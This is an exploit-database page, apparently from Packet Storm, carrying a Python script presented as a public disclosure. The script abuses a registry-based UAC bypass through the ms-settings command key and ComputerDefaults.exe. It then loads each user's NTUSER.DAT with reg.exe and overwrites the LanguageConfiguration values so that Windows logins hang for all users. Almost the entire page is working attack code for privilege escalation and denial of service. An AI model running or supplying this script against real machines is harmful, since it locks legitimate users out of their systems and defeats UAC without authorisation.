This exploit modifies a windows language registry key which causes some windows binaries to stick, including login which makes the session unusable. The key is in HKCU and can be modified without admin rights, but with a bypass UAC, all user sessions can be paralyzed by using reg.exe and user's NTUSER.DAT.
cebc8192e58860f9e56ac23e83917c52d657bce5533347a18906dba9296c9c96#!/usr/bin/env python
#
# Exploit Title: Windows 10 All Users Session Stuck
# Date: 2018-10-24
# Exploit Author: Fabien DROMAS - Security consultant @ Synetis <fabien.dromas[at]synetis[dot]com>
# Twitter: st0rnpentest
#
# After microsoft's refusal to consider the issue as a security problem, I disclose the script
# Vendor Homepage: www.microsoft.com
# Version: Version 10.0.17134.345
# Tested on: Windows 10 pro Version 10.0.17134.345
#
from os import listdir, system, path
from ctypes import *
import _winreg
def create_reg_key(key, value):
try:
_winreg.CreateKey(_winreg.HKEY_CURRENT_USER, 'Software\Classes\ms-settings\shell\open\command')
registry_key = _winreg.OpenKey(_winreg.HKEY_CURRENT_USER, 'Software\Classes\ms-settings\shell\open\command', 0, _winreg.KEY_WRITE)
_winreg.SetValueEx(registry_key, key, 0, _winreg.REG_SZ, value)
_winreg.CloseKey(registry_key)
except WindowsError:
raise
def exec_bypass_uac(cmd):
try:
create_reg_key('DelegateExecute', '')
create_reg_key(None, cmd)
except WindowsError:
raise
def bypass_uac():
try:
current=path.dirname(path.realpath(__file__)) + '\\' + __file__
cmd="C:\windows\System32\cmd.exe /k c:\python27\python %s" %current
exec_bypass_uac(cmd)
system(r'C:\windows\system32\ComputerDefaults.exe')
return 1
except WindowsError:
sys.exit(1)
def modify_reg_key(key, value):
try:
registry_key=_winreg.OpenKey(_winreg.HKEY_CURRENT_USER, 'Control Panel\Desktop\LanguageConfiguration', 0, _winreg.KEY_WRITE)
_winreg.SetValueEx(registry_key, key, 0, _winreg.REG_SZ, value)
_winreg.CloseKey(registry_key)
except WindowsError:
raise
def modify_reg_key_Others(key, value):
try:
registry_key = _winreg.OpenKey(_winreg.HKEY_USERS, 'w00t\Control Panel\Desktop\LanguageConfiguration', 0, _winreg.KEY_WRITE)
_winreg.SetValueEx(registry_key, key, 0, _winreg.REG_SZ, value)
_winreg.CloseKey(registry_key)
except WindowsError:
raise
if __name__ == '__main__':
try:
sys32="c:\\windows\\system32\\"
users="c:\\users\\"
exclude=["Public", "desktop.ini", "All Users"]
# Modify all users
if windll.Shell32.IsUserAnAdmin():
for i in listdir(users):
if i not in exclude:
system("reg.exe LOAD HKU\w00t "+users+i+"\NTUSER.DAT")
modify_reg_key_Others('', '')
system("reg.exe UNLOAD HKU\w00t")
# Modify current user
modify_reg_key('', '')
else:
bypass_uac()
except WindowsError:
raise
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed